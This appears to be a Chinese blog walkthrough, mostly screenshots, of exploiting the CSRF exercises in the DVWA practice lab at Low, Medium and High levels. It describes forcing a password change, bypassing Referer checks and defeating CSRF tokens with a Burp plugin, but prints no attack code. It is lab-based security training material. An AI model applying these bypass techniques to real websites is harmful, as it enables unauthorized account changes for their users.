Low等级
![](https://i-blog.csdnimg.cn/blog_migrate/66be921c9e9ce3ca11925cf87329ef16.webp?x-image-process=image/format,png)
image
抓包
![](https://i-blog.csdnimg.cn/blog_migrate/6ee0ceebd7c00ccc33034803f97bc6ba.webp?x-image-process=image/format,png)
image
正常跳转
![](https://i-blog.csdnimg.cn/blog_migrate/b536e7c4e0f8e8fc143f8cb1d1bf4dcd.webp?x-image-process=image/format,png)
image
![](https://i-blog.csdnimg.cn/blog_migrate/b41eb1623ead990be4e6093b57075ea5.webp?x-image-process=image/format,png)
image
在这里我们把密码改为qwer
![](https://i-blog.csdnimg.cn/blog_migrate/78b524bfed139c39a86e408bbc8caae4.webp?x-image-process=image/format,png)
image
![](https://i-blog.csdnimg.cn/blog_migrate/daea5077266236154c25d271c68b8ead.webp?x-image-process=image/format,png)
image
![](https://i-blog.csdnimg.cn/blog_migrate/0312073f0f3dd3a13699cf95b1dad538.webp?x-image-process=image/format,png)
image
![](https://i-blog.csdnimg.cn/blog_migrate/3993a1909f60c20610c4391711a97878.webp?x-image-process=image/format,png)
image
![](https://i-blog.csdnimg.cn/blog_migrate/fd8b5223bf9149da56023977f979a771.webp?x-image-process=image/format,png)
image
成功进入了DVWA
![](https://i-blog.csdnimg.cn/blog_migrate/78d2c660b9ad7b4fbc5fe5b1b7ccf680.webp?x-image-process=image/format,png)
image
CSRF Medium等级:
开始,抓包
![](https://i-blog.csdnimg.cn/blog_migrate/cda48f79a769dac925bfa1e5c7cf70f3.webp?x-image-process=image/format,png)
image.png
![](https://i-blog.csdnimg.cn/blog_migrate/ee4e269364a939f0341050802ef578de.webp?x-image-process=image/format,png)
image.png
很显然,网站对referer做了验证,绕过referer验证有以下几种方法:
1)空Referer绕过:
在referer字段后添加:http:// https:// ftp:// file://,在发送,看是否可以绕过referer验证。
2)判断referer是否存在某个关键词。
在本示例中用第二种方法绕过referer验证:
![](https://i-blog.csdnimg.cn/blog_migrate/c39433406e5ae36c87feb67e98cc4562.webp?x-image-process=image/format,png)
image.png
构造csrf poc:
![](https://i-blog.csdnimg.cn/blog_migrate/9236297011ed5e5e438faebf1d48189b.webp?x-image-process=image/format,png)
image.png
![](https://i-blog.csdnimg.cn/blog_migrate/1c2f06d75d1f95debe6cf8e192cc0c5a.webp?x-image-process=image/format,png)
image.png
![](https://i-blog.csdnimg.cn/blog_migrate/7be3d7f4c9b727851fcf5bc9ee8c28f1.webp?x-image-process=image/format,png)
image.png
![](https://i-blog.csdnimg.cn/blog_migrate/e286c9a11b6ab3c745ac4a9d6fb26ccc.webp?x-image-process=image/format,png)
image.png
CSRF High等级:
![](https://i-blog.csdnimg.cn/blog_migrate/f197e4046d85ba8ee84259d6a145ba99.webp?x-image-process=image/format,png)
image.png
所以像medium和low等级那样的方法是不能用的了,但是我们可以利用burp的插件CSRF Token Tracker绕过token验证:
![](https://i-blog.csdnimg.cn/blog_migrate/653aa42bdc85e573cd18aac290280abc.webp?x-image-process=image/format,png)
image.png
![](https://i-blog.csdnimg.cn/blog_migrate/553c8730102f650b584570ec184d0dde.webp?x-image-process=image/format,png)
image.png
![](https://i-blog.csdnimg.cn/blog_migrate/ae6a8e2f301bf07221554ece6034e574.webp?x-image-process=image/format,png)
image.png
然后来到repeater选项下:
![](https://i-blog.csdnimg.cn/blog_migrate/5072f8ea4992f961a2f1ed20cff53ec4.webp?x-image-process=image/format,png)
image.png